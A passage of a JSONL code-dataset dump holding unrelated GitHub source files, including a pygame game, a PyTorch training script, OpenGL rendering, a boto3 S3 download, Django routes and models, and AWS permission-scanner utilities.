button.click()\nexcept NoSuchElementException as e:\n print(\"没找到按钮\")\n driver.quit();\n\ntime.sleep(5)\n","repo_name":"ssxyyds/python","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75076296487","text":"import pygame\nimport random\npygame.init()\nwidth=480\nheight=360\nscreen=pygame.display.set_mode((width,height))\npygame.display.set_caption(\"skatter BOy\")\n\n#images\n\nroad=pygame.image.load(\"roada.jpg\")\nrwh=road.get_size()\nclock=pygame.time.Clock()\n\n#color\nWHITE=(255,255,255)\nBLACK=(0,0,0)\nRED=(255,0,0)\nYELLOW=(237,218,15)\nORANGE =(237,118,15)\n\nx1=0\nx2=0\nx3=0\nsx=470\nsy=int(rwh[0]/2)\ncx=30\ncy=int(rwh[1]/2)\ncx_c=0\ncy_c=0\ns=0\nry=random.randrange(rwh[1])\ndef msg(text,color,x,y,size=25):\n font=pygame.font.SysFont(None,size)\n msg=font.render(text,True,color,)\n screen.blit(msg,(x,y))\n \ndef explosion(e_x,e_y):\n mag=1\n clock.tick(10)\n color=[RED,YELLOW,ORANGE]\n while True:\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n pygame.quit\n quit()\n e_x=e_x+random.randrange(-1*mag,mag)\n e_y=e_y+random.randrange(-1*mag,mag)\n mag+=1\n if mag==30:\n break\n pygame.draw.circle(screen,color[random.randrange(0,3)],(e_x,e_y),5)\n \nwhile True:\n \n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n pygame.quit()\n quit()\n if event.type==pygame.KEYDOWN:\n if event.key==pygame.K_ESCAPE:\n pygame.quit()\n quit()\n if event.key==pygame.K_UP:\n cy_c-=3\n if event.key==pygame.K_DOWN:\n cy_c+=3\n if event.key==pygame.K_RIGHT:\n cx_c+=3\n if event.key==pygame.K_LEFT:\n cx_c-=3 \n \n if event.type==pygame.KEYUP:\n if event.key==pygame.K_UP or event.key==pygame.K_DOWN:\n cy_c=0\n if event.key==pygame.K_LEFT or event.key==pygame.K_RIGHT:\n \n cx_c=0\n cx+=cx_c\n cy+=cy_c\n \n if x1+rwh[0]<0:\n x1=width\n if x2+2*rwh[0]<0:\n x2=width-rwh[0]\n\n if x3+3*rwh[0]<0:\n x3=width-2*rwh[0]\n \n \n if sx+30<0:\n sx=width\n ry=random.randrange(rwh[1]-30)\n\n sx-=10\n x1-=10\n x3-=10\n x2-=10\n screen.fill(WHITE)\n screen.blit(road,(x1,5))\n screen.blit(road,(x2+rwh[0],5))\n screen.blit(road,(x3+2*rwh[0],5))\n stone=pygame.draw.rect(screen,BLACK,(sx,ry,30,30))\n car =pygame.draw.circle(screen,WHITE,(40+cx,cy,),18)\n if stone.colliderect(car):\n sx=width\n ry=random.randrange(rwh[1]-30)\n explosion(40+cx,cy)\n s+=1\n \n msg(\"score:\"+str(s),BLACK,50,190) \n\n pygame.display.update()\n clock.tick(20)\n","repo_name":"mandeepmourya007/my-game","sub_path":"skater.py","file_name":"skater.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29595911255","text":"import argparse\nimport json\nfrom collections import Counter\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm, trange\nimport time\nfrom Modules.MLP import ourModel\nfrom Modules.MLP import train_epoch\nfrom utils.dataset import DoctorRecDataset\nfrom utils.EarlyStopping import EarlyStopping\nfrom utils.loss import weighted_class_bceloss\nfrom utils.config import init_opts, train_opts, multihead_att_opts\n\nfrom utils.util import save_pickle, load_pickle\nfrom transformers import AdamW, BertModel, BertTokenizer, get_linear_schedule_with_warmup\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--seed', default=2021, type=int)\nparser.add_argument('--gpu', default=0, type=int)\nparser.add_argument('--name', default=\"med-bert\", type=str)\nparser.add_argument('--cleaned_path', default='./cleaned', type=str)\n\nparser.add_argument('--dr_dialog_sample', default=2, type=int)\nparser.add_argument('--neg_sample', default=2, type=int)\nparser.add_argument('--batch_size', default=2, type=int)\nparser.add_argument('--lr', default=2e-5, type=int)\nparser.add_argument('--patience', default=7, type=int)\nparser.add_argument('--output_dir', default=\"saved_model\", type=str)\nparser.add_argument('--epoch_num', default=10, type=int)\n\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\nnp.random.seed(args.seed)\nrandom.seed(args.seed)\ntorch.cuda.set_device(args.gpu)\n\nprint(f'Training: randome seed {args.seed}, experiment name: {args.name}, run on gpu {args.gpu}')\n\ndef train_model(model, train_dataloader, val_dataloader):\n print(f'{args.name} start training...')\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n weight_decay = 0\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": weight_decay,\n },\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], \"weight_decay\": 0.0},\n ]\n optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=args.lr, eps=1e-8, weight_decay=0)\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.1, patience=args.patience, threshold=1e-4, min_lr=1e-5)\n early_stopping = EarlyStopping(patience = args.patience, verbose = True, path = f'{args.output_dir}/ckpt/best_model.pt')\n\n\n train_losses = []\n valid_losses = []\n for epoch in trange(args.epoch_num):\n print(f'Current Epoch: {epoch+1}')\n model.train()\n train_losses = train_epoch(train_dataloader, optimizer, model, \"train\")\n model.eval()\n with torch.no_grad():\n valid_losses = train_epoch(val_dataloader, optimizer, model, \"valid\")\n \n train_loss = np.average(train_losses)\n valid_loss = np.average(valid_losses)\n \n print(f'\\nEpoch {epoch+1}, train loss: {train_loss}, valid loss: {valid_loss}')\n torch.save(model.state_dict(),f'./{args.output_dir}/ckpt/model_{epoch+1}.pt')\n if (epoch+1 > 15): \n early_stopping(valid_loss, model)\n if early_stopping.early_stop:\n print(f'Early stopping at epoch {epoch+1}')\n break \n scheduler.step(valid_loss)\n\ndef main():\n print(f'Loadding ids from {args.cleaned_path}...')\n start = time.time()\n profile_ids = load_pickle(f'{args.cleaned_path}/profile_ids_mini.pkl')\n print(\"Loaded profile ids\")\n query_ids = load_pickle(f'{args.cleaned_path}/q_ids_mini.pkl')\n print(\"Loaded query ids\")\n dialogue_ids = load_pickle(f'{args.cleaned_path}/dialog_ids_mini.pkl')\n print(\"Loaded dialogue ids\")\n end = time.time()\n print(\"Total loading time: \", end-start, \"s\")\n print('Data Statics:')\n print(\"The length of profiles: \", len(profile_ids))\n print(\"The length of querys: \", len(query_ids))\n print(\"The length of dialogues: \", len(dialogue_ids))\n\n print('Building training dataset and dataloader...')\n train_set = pd.read_csv(f'./dataset/train_mini.csv', delimiter='\\t', encoding='utf-8', dtype={'dr_id': str})\n train_dataset = DoctorRecDataset(\n 'train', train_set, profile_ids, query_ids, dialogue_ids,\n dr_dialog_sample=args.dr_dialog_sample, neg_sample=args.neg_sample\n )\n train_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True)\n del train_set, train_dataset\n print('Done')\n \n print('Building validation dataset and dataloader...')\n valid_set = pd.read_csv(f'./dataset/valid_mini.csv', delimiter='\\t', encoding='utf-8', dtype={'dr_id': str})\n val_dataset = DoctorRecDataset(\n 'valid', valid_set, profile_ids, query_ids, dialogue_ids,\n dr_dialog_sample=args.dr_dialog_sample, neg_sample=args.neg_sample\n )\n val_dataloader = DataLoader(val_dataset, batch_size=args.batch_size, shuffle=True)\n del valid_set, val_dataset, profile_ids, query_ids, dialogue_ids,\n print('Done')\n \n model = ourModel()\n model.cuda()\n\n train_model(model, train_dataloader, val_dataloader)\n\nif __name__ == '__main__':\n main()","repo_name":"ewayuan/DocRec","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3179616359","text":"from OpenGL.GL import *\r\nfrom OpenGL.GLUT import *\r\nfrom OpenGL.GLU import *\r\nimport sys\r\nimport png\r\n\r\nfrom math import *\r\nimport math\r\nimport random\r\n\r\ndist = 2\r\n\r\nside_count = 6\r\n\r\nwindow = 0\r\n\t\r\nheight = 1.8\r\n\r\nside_rads_size = (2*math.pi)/side_count\r\n\r\ndown_radius = 1.3\r\nup_radius = 0.5\r\ndown_vertices = []\r\nup_vertices = []\r\n\r\n\r\n\r\ncurrentRotationX = currentRotationY = currentRotationZ = 0.0\r\noffsetRotationX = 0.6\r\noffsetRotationY = 0.2\r\noffsetRotationZ = 0.4\r\n\r\ndef LoadTextures():\r\n\tglobal texture\r\n\ttexture = glGenTextures(2) \r\n\r\n\treader = png.Reader(filename='textura.png')\r\n\tw, h, pixels, metadata = reader.read_flat()\r\n\tif(metadata['alpha']):\r\n\t\tmodo = GL_RGBA\r\n\telse:\r\n\t\tmodo = GL_RGB\r\n\tglBindTexture(GL_TEXTURE_2D, texture[1])\r\n\tglPixelStorei(GL_UNPACK_ALIGNMENT,1)\r\n\tglTexImage2D(GL_TEXTURE_2D, 0, modo, w, h, 0, modo, GL_UNSIGNED_BYTE, pixels.tolist())\r\n\tglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)\r\n\tglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)\r\n\tglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\r\n\tglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\r\n\tglTexEnvf(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_DECAL)\r\n\r\ndef InitGL(Width, Height): \r\n\tLoadTextures()\r\n\tglEnable(GL_TEXTURE_2D)\r\n\tglClearColor(0.0, 0.0, 0.0, 0.0) \r\n\tglClearDepth(1.0)\r\n\tglDepthFunc(GL_LESS) \r\n\tglEnable(GL_DEPTH_TEST) \r\n\tglShadeModel(GL_SMOOTH) \r\n\tglMatrixMode(GL_PROJECTION)\r\n\tgluPerspective(45.0, float(Width)/float(Height), 0.1, 100.0)\r\n\tglMatrixMode(GL_MODELVIEW)\r\n\r\ndef ReSizeGLScene(Width, Height):\r\n\tif Height == 0: \r\n\t\tHeight = 1\r\n\tglViewport(0, 0, Width, Height) \r\n\tglMatrixMode(GL_PROJECTION)\r\n\tglLoadIdentity()\r\n\tgluPerspective(45.0, float(Width)/float(Height), 0.1, 100.0)\r\n\tglMatrixMode(GL_MODELVIEW)\r\n\r\ndef DrawGLScene():\r\n\tglobal currentRotationX, currentRotationY, currentRotationZ, texture, down_vertices, up_vertices\r\n\r\n\tglClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT) \r\n\tglLoadIdentity() \r\n\tglClearColor(0.5,0.5,0.5,1.0) \r\n\tglTranslatef(0.0,0.0,-5.0)\r\n\tglRotatef(currentRotationX,1.0,0.0,0.0)\r\n\tglRotatef(currentRotationY,0.0,1.0,0.0)\r\n\tglRotatef(currentRotationZ,0.0,0.0,1.0)\r\n\r\n\tglBindTexture(GL_TEXTURE_2D, texture[1])\r\n\tglBegin(GL_POLYGON)\r\n\r\n\t# Creating and drawing down vertices\r\n\tfor i in range(0,side_count):\r\n\t\tx = down_radius * math.cos(i*side_rads_size)\r\n\t\ty = down_radius * math.sin(i*side_rads_size)\r\n\t\tglTexCoord2f(math.cos(i), math.sin(i))\r\n\t\tdown_vertices += [ (x,y) ]\r\n\t\tglVertex3f(x,y,0.0)\r\n\tglEnd()\r\n\r\n\t# Creating and drawing up vertices\r\n\tglBegin(GL_POLYGON)\r\n\tfor i in range(0,side_count):\r\n\t\tx = up_radius * math.cos(i*side_rads_size)\r\n\t\ty = up_radius * math.sin(i*side_rads_size)\r\n\t\tglTexCoord2f(math.cos(i), math.sin(i))\r\n\t\tup_vertices += [ (x,y) ]\r\n\t\tglVertex3f(x,y,height)\r\n\tglEnd()\r\n\r\n\t#Drawing side faces\r\n\tglBegin(GL_QUADS)\r\n\tfor i in range(0,side_count):\r\n\t\tglTexCoord2f(0.0, 1.0); glVertex3f(down_vertices[i][0],down_vertices[i][1],0.0)\r\n\t\tglTexCoord2f(0.0, 0.0); glVertex3f(up_vertices[i][0],up_vertices[i][1],height)\r\n\t\tglTexCoord2f(1.0, 0.0); glVertex3f(up_vertices[(i+1)%side_count][0],up_vertices[(i+1)%side_count][1],height)\r\n\t\tglTexCoord2f(1.0, 1.0); glVertex3f(down_vertices[(i+1)%side_count][0],down_vertices[(i+1)%side_count][1],0.0)\r\n\tglEnd()\r\n \r\n\tcurrentRotationX = currentRotationX + offsetRotationX\r\n\tcurrentRotationY = currentRotationY + offsetRotationY\r\n\tcurrentRotationZ = currentRotationZ + offsetRotationZ\r\n\r\n\tglutSwapBuffers()\r\n\r\n\r\ndef main():\r\n\tglobal window\r\n\tglutInit(sys.argv)\r\n\tglutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)\r\n\tglutInitWindowSize(640, 480)\r\n\tglutInitWindowPosition(0, 0)\r\n\t\r\n\twindow = glutCreateWindow(\"Tronco de Pirâmide com a textura de pedras\")\r\n\r\n\tglutDisplayFunc(DrawGLScene)\r\n\tglutIdleFunc(DrawGLScene)\r\n\tglutReshapeFunc(ReSizeGLScene)\r\n\t\r\n\tInitGL(640, 480)\r\n\r\n\tglutMainLoop()\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()","repo_name":"gabrieldevsouza/ComputacaoGraficaCEFET-2","sub_path":"TroncoPiramidePedra/troncoPiramide_pedra.py","file_name":"troncoPiramide_pedra.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21601833875","text":"'''\n-------------------------------------------------------------------------------\nName:\t\t2.livehack_practice_solution2.py\nPurpose:\tDetermining if the triangle is a right angled\n\nAuthor:\tLi.H\n\nCreated:\t14/11/2019\n------------------------------------------------------------------------------\n'''\n# Receive the side lengths from the user\nside_1 = (int(input(\"Enter the length of Side 1: \")))\nside_2 = (int(input(\"Enter the length of Side 2: \")))\nside_3 = (int(input(\"Enter the length of Side 3: \")))\n\n# Calculate the formula\nside_1 = side_1**2\nside_2 = side_2**2\nside_3 = side_3**2\n\n# Calculate the possibilities\nif side_1 + side_2 == side_3:\n print(\"This is a right angled triangle\")\nelif side_1 + side_3 == side_2:\n print(\"This is a right angled triangle\")\nelif side_2 + side_3 == side_1:\n print(\"This is a right angled triangle\")\nelse:\n print(\"This is not a right angled triangle\")","repo_name":"StRobertCHSCS/fabroa-hugoli0903","sub_path":"Working/Practice Questions/2.livehack_practice_solution2.py","file_name":"2.livehack_practice_solution2.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42360238318","text":"from os import mkdir\nfrom os.path import isdir\n\nfrom dotenv import dotenv_values\nfrom boto3 import Session\n\nif __name__ == \"__main__\":\n\n config = dotenv_values()\n aws_session = Session(aws_access_key_id=config[\"AWS_ACCESS_KEY_ID\"],\n aws_secret_access_key=config[\"AWS_SECRET_ACCESS_KEY\"])\n\n s3 = aws_session.client(\"s3\")\n\n if not isdir(config[\"DATA_FOLDER\"]):\n mkdir(config[\"DATA_FOLDER\"])\n \n s3.download_file(config[\"S3_BUCKET_NAME\"],\n config[\"SOURCE_FILE\"],\n f\"./data/{config['DST_FILE']}\")","repo_name":"Peritract/xml-exploration","sub_path":"ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71570111207","text":"# ©️ The NextGuild Project 2023-present\n# If support is needed, you can join the support server (guilded.gg/nextguild) or raise an issue.\n# NOTICE: This example requires a external library, that is not endorsed or supported by The NextGuild Project.\n# CODE LEVEL // BEGINNER - Easy to follow\n# You can install the appropriate dependencies with the following commands in the terminal:\n# pip install nextguild\n# pip install random\n# pip install websockets\n# pip install requests\n\nfrom nextguild import *\nimport asyncio\nimport random\ntoken = \"YOUR_TOKEN_HERE\" # Replace with your bot's token\nbot = Client(token) # Define the 'bot' variable, and pass on the token to the client\nevents = Events(bot) # Define events and pass the 'bot' variable containing the client information to register and pass valid information to the Guilded API\n\n@events.on_message # Use the 'on_message' event to make a conditional usage\nasync def random_number(message): # Define the name of the function within the event and look specifically only from the messages section of the Guilded API\n if message.content == \"!random_number\": # Look if the message equals '!random_number'. If it does, do the code below this specific 'if' statement.\n bot.send_message(message.channel_id, f\"Here is your random number: {random.choice(range(1,101))}\") # The range is put until 101 because python generally does what we would do a 1-100 range to a 0-99 range. So, we have to add a 1 to the 100 so it becomes 0-100 when randomly generated via the random library.\nasyncio.run(events.run())\n","repo_name":"ArjunSharda/nextguild","sub_path":"examples/random_number.py","file_name":"random_number.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"37051628233","text":"#!/usr/bin/env python \n# coding=utf-8\n__author__ = 'Boaz'\n# @Time : 2019/4/3 17:34 \n\nimport trio\n\nasync def async_double(x):\n return 2 * x\n\nprint(trio.run(async_double, 3))","repo_name":"davidzhu1989/python-magic","sub_path":"Python-basic/异步爬虫/异步爬虫试试Trio吧/async_a.py","file_name":"async_a.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44128638898","text":"import argparse\nfrom mkr.benchmark import OpenedBookQABenchmark\nfrom mkr.resources.resource_manager import ResourceManager\nfrom mkr.retrievers.dense_retriever import DenseRetriever, DenseRetrieverConfig\nfrom mkr.question_answering.answer_extractor import AnswerExtractor, AnswerExtractorConfig\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--retriever_name\", type=str, default=\"mE5_small\")\n parser.add_argument(\"--extractor_name\", type=str, default=\"mRoBERTa\")\n args = parser.parse_args()\n\n # Check GPU available\n # Use PyTorch\n import torch\n print(f\"GPU available: {torch.cuda.is_available()}\")\n\n # Prepare models\n retriever = DenseRetriever(\n DenseRetrieverConfig(\n model_name=args.retriever_name,\n database_path=f\"./database/{args.retriever_name}\",\n ),\n )\n extractor = AnswerExtractor(AnswerExtractorConfig(model_name=args.extractor_name))\n\n # Prepare benchmark\n benchmark = OpenedBookQABenchmark(\n resource_management=ResourceManager(),\n retriever=retriever,\n extractor=extractor\n )\n benchmark.evaluate_on_datasets(\n [\"iapp_wiki_qa\", \"tydiqa\", \"xquad\"]\n )","repo_name":"panuthept/multilingual-knowledge-retrieval","sub_path":"eval_openedbook_qa.py","file_name":"eval_openedbook_qa.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"527690618","text":"from dataclasses import dataclass, field\nfrom typing import Dict, List, Optional\n\nfrom aws_ptrp.policy_evaluation import PolicyEvaluationApplyResult, PolicyEvaluationResult, PolicyEvaluationsResult\nfrom aws_ptrp.ptrp_allowed_lines.allowed_line_nodes_base import NodeBase, NodeNote, NodeNotesGetter, PoliciesNodeBase\nfrom aws_ptrp.ptrp_models.ptrp_model import AwsPtrpNodeNote\nfrom aws_ptrp.services import MethodOnStmtActionsResultType, MethodOnStmtActionsType\n\n\n@dataclass\nclass NodeNotes:\n node_notes: List[NodeNote] = field(default_factory=list)\n\n def extend(self, other: 'NodeNotes'):\n self.node_notes.extend(other.node_notes)\n\n def add_node_note(self, node_note: NodeNote):\n self.node_notes.append(node_note)\n\n def get_node_notes(self) -> List[NodeNote]:\n return self.node_notes\n\n def get_aws_ptrp_node_notes(self) -> List[AwsPtrpNodeNote]:\n return [node_note.to_ptrp_node_note() for node_note in self.node_notes]\n\n\n@dataclass\nclass NodesNotes(NodeNotesGetter):\n nodes_notes: Dict[NodeBase, NodeNotes] = field(default_factory=dict)\n\n def extend(self, other: 'NodesNotes'):\n for other_node_base, other_node_notes in other.nodes_notes.items():\n node_notes: Optional[NodeNotes] = self.nodes_notes.get(other_node_base)\n if node_notes:\n node_notes.extend(other_node_notes)\n else:\n self.nodes_notes[other_node_base] = other_node_notes\n\n # NodeNotesGetter\n def get_node_notes(self, node_base: NodeBase) -> List[NodeNote]:\n node_notes = self.nodes_notes.get(node_base)\n if node_notes:\n return node_notes.get_node_notes()\n return []\n\n def get_aws_ptrp_node_notes(self, node_base: NodeBase) -> List[AwsPtrpNodeNote]:\n node_notes = self.nodes_notes.get(node_base)\n if node_notes:\n ret = node_notes.get_aws_ptrp_node_notes()\n ret.sort()\n return ret\n return []\n\n\ndef _update_nodes_notes(\n nodes_notes: NodesNotes,\n policy_apply_result: PolicyEvaluationApplyResult,\n service_name: str,\n principal_policies_node_base: PoliciesNodeBase,\n target_node_base: NodeBase,\n resource_node_note: NodeBase,\n):\n # For each resolved_stmt in the policy evaluation result, explicit deny result: check if there are stmt with Deny + condition\n for (\n resolved_stmt,\n method_on_stmt_actions_result_type,\n ) in policy_apply_result.explicit_deny_result.yield_resolved_stmts(\n MethodOnStmtActionsType.DIFFERENCE,\n list(\n [\n MethodOnStmtActionsResultType.IGNORE_METHOD_DIFFERENCE_CONDITION_EXISTS,\n MethodOnStmtActionsResultType.IGNORE_METHOD_DIFFERENCE_WITH_S3_NOT_RESOURCE_OBJECT_REGEX,\n ]\n ),\n ):\n # build the node note params\n stmt_name = f\"statement '{resolved_stmt.stmt_name}' in \" if resolved_stmt.stmt_name else ''\n policy_name = (\n f\"policy '{resolved_stmt.policy_name}'\"\n if resolved_stmt.policy_name\n else f\"policy of {resolved_stmt.stmt_parent_arn}\"\n )\n attached_to_other_node_arn = \"\"\n node_base_to_add: Optional[NodeBase] = None\n\n # lookup the relevant node to add the note\n # first, check the target node base (prior to the resource node / identity policies nodes)\n if target_node_base.get_node_arn() == resolved_stmt.stmt_parent_arn and (\n # if there is policy name, compare it\n resolved_stmt.policy_name is None\n or resolved_stmt.policy_name == target_node_base.get_node_name()\n ):\n node_base_to_add = target_node_base\n elif resource_node_note.get_node_arn() == resolved_stmt.stmt_parent_arn:\n node_base_to_add = resource_node_note\n else:\n # check if the resolved_stmt coming from inline policy or attached iam policy (which doesn't appear as a node in the allowed line nodes)\n for inline_policy_ctx in principal_policies_node_base.get_inline_policies_ctx():\n if inline_policy_ctx.parent_arn == resolved_stmt.stmt_parent_arn:\n node_base_to_add = principal_policies_node_base\n # if the arn of the node is not the same as the inline policy arn (can happen for iam user that attached to iam group which has inline policy)\n if principal_policies_node_base.get_node_arn() != inline_policy_ctx.parent_arn:\n attached_to_other_node_arn = f\" ({resolved_stmt.stmt_parent_arn})\"\n break\n if node_base_to_add is None:\n for attached_policy_arn in principal_policies_node_base.get_attached_policies_arn():\n if attached_policy_arn == resolved_stmt.stmt_parent_arn:\n attached_to_other_node_arn = f\" ({resolved_stmt.stmt_parent_arn})\"\n node_base_to_add = principal_policies_node_base\n break\n\n if node_base_to_add:\n node_notes = nodes_notes.nodes_notes.setdefault(node_base_to_add, NodeNotes())\n note = NodeNote.from_stmt_info_and_action_stmt_result_type(\n stmt_name, policy_name, attached_to_other_node_arn, service_name, method_on_stmt_actions_result_type\n )\n if note:\n node_notes.add_node_note(note)\n\n\ndef get_nodes_notes_from_target_policy_resource_based(\n policy_evaluations_result: PolicyEvaluationsResult,\n service_name: str,\n principal_policies_node_base: PoliciesNodeBase,\n target_node_base: NodeBase,\n resource_node_note: NodeBase,\n) -> NodesNotes:\n nodes_notes = NodesNotes()\n policy_apply_result = policy_evaluations_result.get_policy_apply_result()\n if policy_apply_result:\n _update_nodes_notes(\n nodes_notes=nodes_notes,\n policy_apply_result=policy_apply_result,\n service_name=service_name,\n principal_policies_node_base=principal_policies_node_base,\n target_node_base=target_node_base,\n resource_node_note=resource_node_note,\n )\n policy_apply_result_cross_account = policy_evaluations_result.get_cross_account_policy_apply_result()\n if policy_apply_result_cross_account:\n _update_nodes_notes(\n nodes_notes=nodes_notes,\n policy_apply_result=policy_apply_result_cross_account,\n service_name=service_name,\n principal_policies_node_base=principal_policies_node_base,\n target_node_base=target_node_base,\n resource_node_note=resource_node_note,\n )\n return nodes_notes\n\n\ndef get_nodes_notes_from_target_policies_identity_based(\n policy_evaluation_result: PolicyEvaluationResult,\n service_name: str,\n principal_policies_node_base: PoliciesNodeBase,\n target_node_base: NodeBase,\n resource_node_note: NodeBase,\n) -> NodesNotes:\n policy_apply_result = policy_evaluation_result.get_policy_apply_result()\n nodes_notes = NodesNotes()\n if policy_apply_result:\n _update_nodes_notes(\n nodes_notes=nodes_notes,\n policy_apply_result=policy_apply_result,\n service_name=service_name,\n principal_policies_node_base=principal_policies_node_base,\n target_node_base=target_node_base,\n resource_node_note=resource_node_note,\n )\n return nodes_notes\n\n\ndef get_nodes_notes_from_identity_center_user(\n target_node_base: NodeBase,\n identity_center_instance_arn: str,\n identity_center_account_id: str,\n identity_center_region: str,\n) -> NodesNotes:\n nodes_notes = NodesNotes()\n note = NodeNote.from_user_and_identity_center_instance_info(\n target_node_base.get_node_name(),\n identity_center_instance_arn,\n identity_center_account_id,\n identity_center_region,\n )\n nodes_notes.nodes_notes.setdefault(target_node_base, NodeNotes()).add_node_note(note)\n return nodes_notes\n","repo_name":"SatoriCyber/universal-data-permissions-scanner","sub_path":"universal_data_permissions_scanner/datastores/aws/aws_ptrp_package/aws_ptrp/ptrp_allowed_lines/allowed_line_node_notes.py","file_name":"allowed_line_node_notes.py","file_ext":"py","file_size_in_byte":8007,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"31589327637","text":"from bs4 import BeautifulSoup\nimport requests\n# scrape and print India covid data (cases, deaths and recoviers)\n\ndef main():\n URL = \"https://www.worldometers.info/coronavirus/country/india\"\n webpage = requests.get(URL)\n content = BeautifulSoup(webpage.content, \"html.parser\")\n elements = content.find_all(\"div\", class_=\"maincounter-number\")\n for element in elements:\n value = element.find(\"span\")\n print(value.text.strip())\n\nif __name__ == \"__main__\":\n main()","repo_name":"John-Ling/Covid-Companion","sub_path":"tests/scrape_test.py","file_name":"scrape_test.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16701595307","text":"\"\"\"eengineDjango URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom frontend import views\nfrom frontend.forms import BootstrapAuthenticationForm\nimport datetime\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.index, name='index'), \n url(r'^opscen', views.opscen, name='opscen'), \n url(r'^user_list', views.user_list, name='user_list'), \n\n url(r'^contact', views.contact, name='contact'), \n url(r'^logout', views.logout, name='logout'), \n url(r'^search', views.search, name='search'), \n \n url(r'^cancel_order' , views.cancel_order, name='cancel_order'), \n url(r'^close_position' , views.close_position, name='close_position'), \n url(r'^get_trading_data', views.get_trading_data, name='get_trading_data'), \n\n url(r'^horizon_scanning', views.horizon_scanning, name='horizon_scanning'), \n url(r'^processLogin', views.processLogin, name='processLogin'), \n url(r'^login',\n 'django.contrib.auth.views.login',\n {\n 'template_name': 'frontend/login.html',\n 'authentication_form': BootstrapAuthenticationForm,\n 'extra_context':\n {\n 'title':'Log in',\n 'year':datetime.datetime.now().year,\n }\n },\n name='login'), \n]\n","repo_name":"TMda/MyAlgoSystem","sub_path":"MyAlgoDjango/MyAlgoDjango/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17300494221","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\nfrom apps.core import utils\nfrom apps.core.db.models import (ImageModelMixin, InfoMixin, SlugMixin,\n TimestampMixin, UUIDMixin)\nfrom apps.developers.models import Profile\n\nfrom .choices import VoteType\n\n\nclass Project(UUIDMixin, InfoMixin, SlugMixin, TimestampMixin, ImageModelMixin):\n POSITIVE = \"Positive\"\n NEGATIVE = \"Negative\"\n VOTE = \"Vote\"\n VOTES = \"Votes\"\n IMAGE_URL = \"/static/images/default.jpg\"\n\n owner = models.ForeignKey(Profile, on_delete=models.CASCADE, related_name=\"projects\", null=True, blank=True)\n source_link = models.URLField(null=True, blank=True, verbose_name=_(\"Source Link\"))\n demo_link = models.URLField(null=True, blank=True, verbose_name=_(\"Demo Link\"))\n votes = models.IntegerField(default=0, verbose_name=_(\"Votes\"))\n vote_ratio = models.IntegerField(default=0, verbose_name=_(\"Votes Ratio\"))\n tags = models.ManyToManyField(\n \"projects.Tag\",\n null=True,\n blank=True,\n verbose_name=_(\"Tags\"),\n related_name=\"projects\",\n ) # 